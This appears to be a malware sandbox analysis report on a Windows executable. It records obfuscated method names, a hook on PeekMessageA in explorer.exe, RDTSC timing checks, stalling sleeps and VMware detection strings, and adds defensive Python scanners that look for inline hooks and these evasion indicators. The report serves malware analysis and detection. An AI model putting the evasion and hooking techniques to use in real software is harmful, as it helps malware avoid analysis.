          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, JneaKoxYOwZYUwgJbY.cs | High entropy of concatenated method names: 'u4OMbjVaor', 'J1pMBXKvNU', 'j4G29mnpAh', 'lCc26jRUKW', 'UDmMNmq1Ti', 'yBUMI0wMqk', 'rqKM5C3Jp5', 'xuCMHa4avC', 'QSYMsFhA2y', 'Gt0MVKc5Am'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, snN1xF7S4RmgbgcW05.cs | High entropy of concatenated method names: 'nWr6Z2wBRM', 'hm66Dagx0E', 'L6f6Fwjdsx', 'kxY61BmBjN', 'z0L64AeV6l', 'SZN6WDd6KI', 'O2mWrrgYu6uEEdvrJG', 'm1nwloGSeqL0RUba8m', 'o9F66HOKkA', 'gaS6S8YfhW'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, myKyekVHN8n3nqSuWK.cs | High entropy of concatenated method names: 'ToString', 'jnbWNlMop9', 'NVoWPQiL3N', 'N9SWmNAaui', 'Lm9WolqIEh', 'M5qWJnIfEl', 'XT9WrXkObY', 'c8fWl26Awg', 'oVCWfvJ85h', 'C1lWQRg35f'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, S6lVZNGDd6KIuoI9tW.cs | High entropy of concatenated method names: 'PEqEL3Et1n', 'MlEEakkbt7', 'QlXEdqg1hx', 'fvcEZ4d43E', 'KdCEDAPSir', 'aPOdhjP0mJ', 'bqCdxtybLI', 'ItqdyxqhDm', 'CrDdb50sdp', 'QGydpNse3d'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, JPpxSbptHsfMShtm7I.cs | High entropy of concatenated method names: 'F8Y2Gvd2B6', 'zQe2P7QBJB', 'cVd2mrx8Hp', 'zb82okjWP3', 'b5W2HaWllR', 'qvO2J2VKtj', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, DOTAclT6fwjdsxDxYB.cs | High entropy of concatenated method names: 'CfQgRK1rGf', 'vWhgwcY9hS', 'oK0gjFTEhr', 'YkQgTKboc5', 'eljg4OsR1Q', 'myUgWQCOMe', 'T5dgMiVORV', 'rmSg2owPZr', 'cY0gcQ7Q0I', 'kmFgu9plgm'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, lVaG3Sl3dvGlBTGm5Q.cs | High entropy of concatenated method names: 'BOCZAAZ3dO', 'jwtZgmwfua', 'c0OZEyUPBF', 'vjsEByUp24', 'F2aEzbtmHO', 'WpKZ9qUaql', 'KRAZ6H1980', 'gCoZq8VGbJ', 'LI0ZSbK9yb', 'eTtZ74NG2o'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, OR1PhfbJmeXRkgxLeU.cs | High entropy of concatenated method names: 'w472A0jqI5', 'vAZ2aZP5Lh', 'n7q2gi284x', 'bq92dE01kg', 'o6V2Eqgrwe', 'QgV2ZdlacF', 'ur52DuwRUJ', 'ioV2C8mAhn', 'zNE2FmYnC8', 'zFp21TxKbr'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, yoyd7cHYYLaJbiic6L.cs | High entropy of concatenated method names: 'lWp4OCeOLx', 'SJx4IEbsll', 'wGM4HK9BD8', 'JY04syioUd', 'tRv4PKkQYh', 'brY4m541h6', 'Xu14oH6rke', 'jCt4JbsQuT', 'xHn4rX75cx', 'tZM4l5aclk'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, FAwW796SXsNRBegtEvs.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mvIuHktqQG', 'ubKus5gh1t', 'XhOuVyLHlT', 'WCXu0RYC6Q', 'iyBuh5vNXb', 'TgwuxFlqpW', 'lK7uyuugO4'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, Q6n3y0QYd7oU3LmetC.cs | High entropy of concatenated method names: 'dUSZtlo0Uy', 'VQBZeULg2j', 'nGnZYG4M51', 'dNjZRmmIh7', 'I8AZixR4Fk', 'S5hZw5Tynv', 'pMuZUOwEbj', 'GjxZj5sjdT', 'c41ZTDYIrt', 'txgZkW5NB9'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, qCKfVZDTTLbfMY8TSL.cs | High entropy of concatenated method names: 'E3NSLUBZZq', 'bYTSAM5Fsi', 'xfDSaD9UWq', 'i00SgchJBh', 'DgCSdkvHyh', 'POUSENtJfV', 'tgeSZXvraH', 'orSSDx04dF', 'gtaSCxdGlL', 'kAZSFskPts'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, aeih4850tCygqgvN25.cs | High entropy of concatenated method names: 'GH38jjxGsP', 'Iuy8TbhtZp', 'Aph8Ge7fDh', 'Q2q8PUGGFa', 'JwY8o7r2uc', 'jsh8J9fTUZ', 'ogW8lNtVw9', 'u4A8fSjkdL', 'FDQ8OhR4Y1', 'BuI8NKKi6y'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, G7ZMqUarOIYkDdbkRW.cs | High entropy of concatenated method names: 'Dispose', 'yRp6pjWoZu', 'cTFqP2B6sh', 'gHSttBZ1hj', 'gNR6B1PhfJ', 'IeX6zRkgxL', 'ProcessDialogKey', 'yUJq9PpxSb', 'xHsq6fMSht', 'H7Iqq8RPRN'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, Iu4ZYc69hOfmwAxsFlO.cs | High entropy of concatenated method names: 'oowctZ0Zme', 'kYMceA13dG', 'iUqcYp9iPH', 'MJUcRt2LGR', 'h9ycief1Hi', 'DOIcwi0Jmb', 'PYZcUaPcT7', 'lBEcjp1ulk', 'vyfcToylkN', 'HelckP2fG2'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, qFJdNBqjj4uODIWIhK.cs | High entropy of concatenated method names: 'ypwYXU9hB', 'tltRemsu9', 'A31wk6CLq', 'A9HUrDerc', 'yLST0DSKo', 'qVLk70ob7', 'hmwAOixhJRWvidKuMd', 'bE4AGxFKj6rgvMfIYZ', 'ekl2usjMu', 'SAsupHHAj'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, K2wBRMjdm6agx0EcTv.cs | High entropy of concatenated method names: 'y2WaHFmxsT', 'kHnasieWZq', 'OaUaVY4RYL', 'H5ga0t6T4K', 'VJ3ahU8tXc', 'eDRaxQTXli', 'tuDayjuYJf', 'UScabNrYPg', 'jLtapQJobC', 'GrBaBGssEF'
          Source: 1.2.2FcJgghyXg.exe.8480000.6.raw.unpack, nRPRNWBauvUXMaKqsE.cs | High entropy of concatenated method names: 'Vlpc6TD2SK', 'Th0cSjJZmn', 'y0Cc7DPYva', 'dg3cAEfdVT', 'fexcaQfrNR', 'QsOcdvbI2v', 'ia0cEM8y1O', 'w002yFsrty', 'JJr2bn3113', 'gDw2pbrqxA'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, srHQXlz7jnNiCOT24M.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'bhWc8hQNPc', 'ig0c40IXah', 'f40cWtj7Th', 'DcBcMvmsBF', 'zV5c2Fj5qC', 'EH7ccvjiF6', 'Q1dcuCOGVd'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, JneaKoxYOwZYUwgJbY.cs | High entropy of concatenated method names: 'u4OMbjVaor', 'J1pMBXKvNU', 'j4G29mnpAh', 'lCc26jRUKW', 'UDmMNmq1Ti', 'yBUMI0wMqk', 'rqKM5C3Jp5', 'xuCMHa4avC', 'QSYMsFhA2y', 'Gt0MVKc5Am'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, snN1xF7S4RmgbgcW05.cs | High entropy of concatenated method names: 'nWr6Z2wBRM', 'hm66Dagx0E', 'L6f6Fwjdsx', 'kxY61BmBjN', 'z0L64AeV6l', 'SZN6WDd6KI', 'O2mWrrgYu6uEEdvrJG', 'm1nwloGSeqL0RUba8m', 'o9F66HOKkA', 'gaS6S8YfhW'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, myKyekVHN8n3nqSuWK.cs | High entropy of concatenated method names: 'ToString', 'jnbWNlMop9', 'NVoWPQiL3N', 'N9SWmNAaui', 'Lm9WolqIEh', 'M5qWJnIfEl', 'XT9WrXkObY', 'c8fWl26Awg', 'oVCWfvJ85h', 'C1lWQRg35f'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, S6lVZNGDd6KIuoI9tW.cs | High entropy of concatenated method names: 'PEqEL3Et1n', 'MlEEakkbt7', 'QlXEdqg1hx', 'fvcEZ4d43E', 'KdCEDAPSir', 'aPOdhjP0mJ', 'bqCdxtybLI', 'ItqdyxqhDm', 'CrDdb50sdp', 'QGydpNse3d'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, JPpxSbptHsfMShtm7I.cs | High entropy of concatenated method names: 'F8Y2Gvd2B6', 'zQe2P7QBJB', 'cVd2mrx8Hp', 'zb82okjWP3', 'b5W2HaWllR', 'qvO2J2VKtj', 'Next', 'Next', 'Next', 'NextBytes'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, DOTAclT6fwjdsxDxYB.cs | High entropy of concatenated method names: 'CfQgRK1rGf', 'vWhgwcY9hS', 'oK0gjFTEhr', 'YkQgTKboc5', 'eljg4OsR1Q', 'myUgWQCOMe', 'T5dgMiVORV', 'rmSg2owPZr', 'cY0gcQ7Q0I', 'kmFgu9plgm'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, lVaG3Sl3dvGlBTGm5Q.cs | High entropy of concatenated method names: 'BOCZAAZ3dO', 'jwtZgmwfua', 'c0OZEyUPBF', 'vjsEByUp24', 'F2aEzbtmHO', 'WpKZ9qUaql', 'KRAZ6H1980', 'gCoZq8VGbJ', 'LI0ZSbK9yb', 'eTtZ74NG2o'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, OR1PhfbJmeXRkgxLeU.cs | High entropy of concatenated method names: 'w472A0jqI5', 'vAZ2aZP5Lh', 'n7q2gi284x', 'bq92dE01kg', 'o6V2Eqgrwe', 'QgV2ZdlacF', 'ur52DuwRUJ', 'ioV2C8mAhn', 'zNE2FmYnC8', 'zFp21TxKbr'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, yoyd7cHYYLaJbiic6L.cs | High entropy of concatenated method names: 'lWp4OCeOLx', 'SJx4IEbsll', 'wGM4HK9BD8', 'JY04syioUd', 'tRv4PKkQYh', 'brY4m541h6', 'Xu14oH6rke', 'jCt4JbsQuT', 'xHn4rX75cx', 'tZM4l5aclk'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, FAwW796SXsNRBegtEvs.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mvIuHktqQG', 'ubKus5gh1t', 'XhOuVyLHlT', 'WCXu0RYC6Q', 'iyBuh5vNXb', 'TgwuxFlqpW', 'lK7uyuugO4'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, Q6n3y0QYd7oU3LmetC.cs | High entropy of concatenated method names: 'dUSZtlo0Uy', 'VQBZeULg2j', 'nGnZYG4M51', 'dNjZRmmIh7', 'I8AZixR4Fk', 'S5hZw5Tynv', 'pMuZUOwEbj', 'GjxZj5sjdT', 'c41ZTDYIrt', 'txgZkW5NB9'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, qCKfVZDTTLbfMY8TSL.cs | High entropy of concatenated method names: 'E3NSLUBZZq', 'bYTSAM5Fsi', 'xfDSaD9UWq', 'i00SgchJBh', 'DgCSdkvHyh', 'POUSENtJfV', 'tgeSZXvraH', 'orSSDx04dF', 'gtaSCxdGlL', 'kAZSFskPts'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, aeih4850tCygqgvN25.cs | High entropy of concatenated method names: 'GH38jjxGsP', 'Iuy8TbhtZp', 'Aph8Ge7fDh', 'Q2q8PUGGFa', 'JwY8o7r2uc', 'jsh8J9fTUZ', 'ogW8lNtVw9', 'u4A8fSjkdL', 'FDQ8OhR4Y1', 'BuI8NKKi6y'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, G7ZMqUarOIYkDdbkRW.cs | High entropy of concatenated method names: 'Dispose', 'yRp6pjWoZu', 'cTFqP2B6sh', 'gHSttBZ1hj', 'gNR6B1PhfJ', 'IeX6zRkgxL', 'ProcessDialogKey', 'yUJq9PpxSb', 'xHsq6fMSht', 'H7Iqq8RPRN'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, Iu4ZYc69hOfmwAxsFlO.cs | High entropy of concatenated method names: 'oowctZ0Zme', 'kYMceA13dG', 'iUqcYp9iPH', 'MJUcRt2LGR', 'h9ycief1Hi', 'DOIcwi0Jmb', 'PYZcUaPcT7', 'lBEcjp1ulk', 'vyfcToylkN', 'HelckP2fG2'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, qFJdNBqjj4uODIWIhK.cs | High entropy of concatenated method names: 'ypwYXU9hB', 'tltRemsu9', 'A31wk6CLq', 'A9HUrDerc', 'yLST0DSKo', 'qVLk70ob7', 'hmwAOixhJRWvidKuMd', 'bE4AGxFKj6rgvMfIYZ', 'ekl2usjMu', 'SAsupHHAj'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, K2wBRMjdm6agx0EcTv.cs | High entropy of concatenated method names: 'y2WaHFmxsT', 'kHnasieWZq', 'OaUaVY4RYL', 'H5ga0t6T4K', 'VJ3ahU8tXc', 'eDRaxQTXli', 'tuDayjuYJf', 'UScabNrYPg', 'jLtapQJobC', 'GrBaBGssEF'
          Source: 1.2.2FcJgghyXg.exe.41d52f0.2.raw.unpack, nRPRNWBauvUXMaKqsE.cs | High entropy of concatenated method names: 'Vlpc6TD2SK', 'Th0cSjJZmn', 'y0Cc7DPYva', 'dg3cAEfdVT', 'fexcaQfrNR', 'QsOcdvbI2v', 'ia0cEM8y1O', 'w002yFsrty', 'JJr2bn3113', 'gDw2pbrqxA'

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exe - User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE0
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Process information set: NOOPENFILEERRORBOX (37 identical events)
          Source: C:\Windows\explorer.exe - Process information set: NOOPENFILEERRORBOX (6 identical events)
          Source: C:\Windows\SysWOW64\msdt.exe - Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exe - Process information set: NOOPENFILEERRORBOX
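The "User mode code has changed" hit above records that the first bytes of user32!PeekMessageA inside explorer.exe no longer match the DLL on disk, which is exactly how inline hooks are found in general: map a clean copy of the module, resolve each export's RVA, and compare the prologue bytes of the live image against the clean one. The scanner below is an added example, not code from the Joe Sandbox report or from the analysed sample. The two "exports", their RVAs, the detour address and all byte strings are constructed for illustration; the trampoline classifier only names the common stubs (jmp rel32, jmp [mem], push/ret, mov rax/jmp rax), and anything else, including the six bytes the report shows, is reported as an unknown patch. The mismatch itself is the signal; the classification is only a convenience.

```python
"""Inline-hook detection by prologue comparison.
Added example; the images below are constructed, not taken from the sample."""
import struct
from typing import Dict, List, Optional, Tuple

PROLOGUE_LEN = 16  # bytes compared per exported function


def classify_patch(code: bytes) -> Optional[str]:
    """Name the trampoline if the patched bytes match a common hook stub."""
    if code[:1] == b"\xE9" and len(code) >= 5:                  # jmp rel32
        rel = struct.unpack_from("<i", code, 1)[0]
        return f"jmp rel32 ({rel:+#x})"
    if code[:2] == b"\xFF\x25" and len(code) >= 6:              # jmp [abs32] / jmp [rip+rel32]
        return "jmp [mem32]"
    if code[:1] == b"\x68" and code[5:6] == b"\xC3":            # push imm32; ret
        target = struct.unpack_from("<I", code, 1)[0]
        return f"push {target:#x} / ret"
    if code[:2] == b"\x48\xB8" and code[10:12] == b"\xFF\xE0":  # mov rax, imm64; jmp rax
        target = struct.unpack_from("<Q", code, 2)[0]
        return f"mov rax, {target:#x} / jmp rax"
    return None


def find_inline_hooks(disk_image: bytes, mem_image: bytes,
                      exports: Dict[str, int]) -> List[Tuple[str, str, str, str]]:
    """Compare each export's prologue in the clean (disk) image with the live
    (memory) image.  `exports` maps name -> RVA, identical in both images once
    the file is mapped.  Returns (name, clean_hex, live_hex, classification)
    for every export whose first PROLOGUE_LEN bytes differ."""
    hits = []
    for name, rva in sorted(exports.items(), key=lambda kv: kv[1]):
        clean = bytes(disk_image[rva:rva + PROLOGUE_LEN])
        live = bytes(mem_image[rva:rva + PROLOGUE_LEN])
        if clean != live:
            hits.append((name, clean.hex(), live.hex(),
                         classify_patch(live) or "unknown patch"))
    return hits


# --- constructed demo data (hypothetical RVAs and bytes) ---------------------
# Classic hot-patchable x86 prologue: mov edi,edi; push ebp; mov ebp,esp; sub esp,1Ch
CLEAN_PEEKMESSAGEA = bytes.fromhex("8BFF558BEC83EC1C") + b"\x90" * 8
# mov edi,edi; push ebp; mov ebp,esp; push ecx; push ecx
CLEAN_GETMESSAGEA = bytes.fromhex("8BFF558BEC5151") + b"\x90" * 9
DEMO_EXPORTS = {"PeekMessageA": 0x100, "GetMessageA": 0x200}
DETOUR_RVA = 0x250  # where the hypothetical detour lives inside the same section


def build_demo_images() -> Tuple[bytes, bytes, Dict[str, int]]:
    """A fake code section as it is on disk, and the same section after a
    5-byte jmp rel32 hook has been written over PeekMessageA's prologue."""
    disk = bytearray(0x300)
    disk[0x100:0x110] = CLEAN_PEEKMESSAGEA
    disk[0x200:0x210] = CLEAN_GETMESSAGEA
    mem = bytearray(disk)
    rva = DEMO_EXPORTS["PeekMessageA"]
    mem[rva:rva + 5] = b"\xE9" + struct.pack("<i", DETOUR_RVA - (rva + 5))
    return bytes(disk), bytes(mem), DEMO_EXPORTS


if __name__ == "__main__":
    for name, clean, live, kind in find_inline_hooks(*build_demo_images()):
        print(f"{name}: {clean} -> {live}  [{kind}]")
```

In a real scanner the clean bytes should come from a fresh image mapping of the DLL in System32 rather than a raw file read, so section alignment matches the live module; exports whose RVA lies outside an executable section should be skipped; and hooks placed by known EDR products, which patch the same prologues, need an allow-list or the scan will report them alongside the malware's.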

          Malware Analysis System Evasion

          Source: Yara match - File source: Process Memory Space: 2FcJgghyXg.exe PID: 7656, type: MEMORYSTR
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe - RDTSC instruction interceptor: First address: 0000000002CA9904 second address: 0000000002CA990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe - RDTSC instruction interceptor: First address: 0000000002CA9B6E second address: 0000000002CA9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe - Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec) (graph_3-13965)
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe TID: 7660 - Thread sleep time: -37529s >= -30000s
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe TID: 7676 - Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe - Last function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exe - Last function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exe - Last function: Thread delayed
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Code function: 2_2_00409AA0 rdtsc
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Thread delayed: delay time: 922337203685477
          Source: C:\Windows\explorer.exe - Window / User API: foregroundWindowGot 877
          Source: C:\Windows\explorer.exe - Window / User API: foregroundWindowGot 865
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - API coverage: 7.5 %
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Thread delayed: delay time: 37529
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Thread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000003.00000000.1258733334.0000000000C86000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: VMware-42 27 43 bd 4f fb d6 f7-05 68 d7 e7 4d 4c b1 65
          Source: explorer.exe, 00000003.00000000.1258733334.0000000000C86000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: ware, Inc.NoneVMware-42 27 43 bd 4f fb d6 f7-05 68 d7 e7 4d 4c b1 65VMware7
          Source: explorer.exe, 00000003.00000002.2509722390.0000000009242000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000002.2499028894.0000000000BE4000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000z
          Source: explorer.exe, 00000003.00000002.2509722390.00000000093C3000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: NXTVMWare
          Source: explorer.exe, 00000003.00000002.2509722390.0000000009242000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000Y
          Source: explorer.exe, 00000003.00000002.2509722390.0000000009360000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267280115.00000000093F5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1267280115.0000000009360000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2509722390.00000000093F4000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.1258733334.0000000000C86000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: VMwareCloudData.Scope
          Source: explorer.exe, 00000003.00000000.1258733334.0000000000C86000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: VMware7
          Source: explorer.exe, 00000003.00000002.2499028894.0000000000BE4000.00000004.00000020.00020000.00000000.sdmp - Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
          Source: explorer.exe, 00000003.00000002.2509722390.00000000095C2000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&11bd2db8&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.2509722390.0000000009242000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&11bd2db8&0&000000*rN(
          Source: explorer.exe, 00000003.00000002.2502312360.0000000004C2A000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&11bd2db8&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g
          Source: explorer.exe, 00000003.00000002.2516134404.000000000BA83000.00000004.00000001.00020000.00000000.sdmp - Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&11BD2DB8&0&000000
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Code function: 2_2_00409AA0 rdtsc
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Process token adjusted: Debug
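The evasion hits in this section fall into a few independent families. The RDTSC interceptor lines show two rdtsc instructions 6 bytes apart (rdtsc; xor ecx, ecx; add ecx, eax; rdtsc), a timing check that measures how long an instrumented environment takes to step through a trivial sequence. The sleep hits compare the thread delay against a 30000 ms threshold; the value 922337203685477 (milliseconds, despite the report's "s" suffix) is 0x7FFFFFFFFFFFFFFF hundred-nanosecond units, the largest relative interval NtDelayExecution accepts, so that thread effectively sleeps until the process is killed. The VMware, NECVMWar and Hyper-V strings are hypervisor artefacts read out of explorer.exe memory. The code-function hits that follow read the PEB through fs:[30h], which is the usual way to reach BeingDebugged, NtGlobalFlag and the loader's module list without calling any API. The static scanner below is an added example and not code from the report or the sample; the byte buffer, memory strings and delay list are constructed, and the threshold mirrors the report's own comparison. Caveat: fs:[30h] reads also occur in ordinary compiler and runtime code, so on their own they are supporting evidence rather than a verdict.

```python
"""Static scan for sandbox-evasion indicators: paired RDTSC, PEB reads via
fs:[30h], hypervisor strings and over-long delays.
Added example; all sample inputs below are constructed."""
from typing import List, Optional, Tuple

RDTSC = b"\x0F\x31"
# x86 encodings of the two PEB loads the report lists.
PEB_READS = {
    b"\x64\xA1\x30\x00\x00\x00": "mov eax, dword ptr fs:[30h]",
    b"\x64\x8B\x0D\x30\x00\x00\x00": "mov ecx, dword ptr fs:[30h]",
}
VM_MARKERS = (b"VMware", b"NECVMWar", b"Hyper-V RAW", b"VirtualBox", b"VBOX", b"QEMU")
# NtDelayExecution takes a negative relative interval in 100 ns units; the
# largest representable one, 0x7FFFFFFFFFFFFFFF, is this many milliseconds.
MAX_RELATIVE_DELAY_MS = (2**63 - 1) // 10_000  # == 922337203685477


def find_all(pattern: bytes, blob: bytes) -> List[int]:
    """All non-overlapping offsets of `pattern` in `blob`."""
    offsets, i = [], blob.find(pattern)
    while i != -1:
        offsets.append(i)
        i = blob.find(pattern, i + len(pattern))
    return offsets


def find_rdtsc_pairs(code: bytes, window: int = 16) -> List[Tuple[int, int]]:
    """Two RDTSCs within `window` bytes of each other: the timing-check shape
    the report flags.  Returns (first_offset, second_offset) pairs."""
    offsets = find_all(RDTSC, code)
    return [(a, b) for a, b in zip(offsets, offsets[1:]) if b - a <= window]


def find_peb_reads(code: bytes) -> List[Tuple[int, str]]:
    """Offsets of fs:[30h] loads (PEB base; BeingDebugged is at +2, Ldr at +0Ch,
    NtGlobalFlag at +68h on x86)."""
    hits = []
    for pattern, mnemonic in PEB_READS.items():
        hits.extend((off, mnemonic) for off in find_all(pattern, code))
    return sorted(hits)


def find_vm_markers(blob: bytes) -> List[str]:
    """Case-insensitive search for hypervisor artefacts like those the report
    read from explorer.exe memory."""
    lower = blob.lower()
    return sorted(m.decode() for m in VM_MARKERS if m.lower() in lower)


def classify_delay(delay_ms: int, threshold_ms: int = 30_000) -> Optional[str]:
    """Mirror the report's '>= 30000' rule and name the sleep-forever case."""
    if delay_ms == MAX_RELATIVE_DELAY_MS:
        return "maximum 64-bit relative delay (sleeps until killed)"
    if delay_ms >= threshold_ms:
        return f"long sleep ({delay_ms} ms >= {threshold_ms} ms)"
    return None


# --- constructed demo input ---------------------------------------------------
# rdtsc; xor ecx,ecx; add ecx,eax; rdtsc: the same 6-byte spacing as the report's hits
TIMING_CHECK = bytes.fromhex("0F31" "31C9" "01C1" "0F31")
SAMPLE_CODE = (b"\x90" * 8 + TIMING_CHECK + b"\x90" * 4
               + bytes.fromhex("64A130000000")      # mov eax, fs:[30h]  (offset 20)
               + b"\x90" * 3
               + bytes.fromhex("648B0D30000000")    # mov ecx, fs:[30h]  (offset 29)
               + b"\xC3")
SAMPLE_MEMORY = (b"\x00SCSI\\Disk&Ven_VMware&Prod_Virtual_disk\x00"
                 b"Hyper-V RAW\x00NECVMWar\x00")
SAMPLE_DELAYS_MS = [37529, 922337203685477, 1000]


if __name__ == "__main__":
    print("rdtsc pairs:", find_rdtsc_pairs(SAMPLE_CODE))
    print("PEB reads:  ", find_peb_reads(SAMPLE_CODE))
    print("VM markers: ", find_vm_markers(SAMPLE_MEMORY))
    for d in SAMPLE_DELAYS_MS:
        print(f"delay {d}:", classify_delay(d))
```

Run against a dumped process image, the rdtsc-pair and fs:[30h] scans locate the code to look at in a disassembler; the string scan is what the sandbox itself does when it reports these memory strings, and the same list is what a hardened analysis VM should scrub from SMBIOS, device names and registry before detonation.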
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Code function: 2_2_0187519B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Code function: 2_2_017C514F mov eax, dword ptr fs:[00000030h] (13 occurrences)
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Code function: 2_2_018491B0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Code function: 2_2_017A514D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Code function: 2_2_017E0145 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Code function: 2_2_0179A147 mov eax, dword ptr fs:[00000030h] (3 occurrences)
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Code function: 2_2_018741C0 mov eax, dword ptr fs:[00000030h] (7 occurrences)
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Code function: 2_2_0179F113 mov eax, dword ptr fs:[00000030h] (21 occurrences)
          Source: C:\Users\user\Desktop\2FcJgghyXg.exe - Code function: 2_2_0185B1EF mov eax, dword ptr fs:[00000030h]
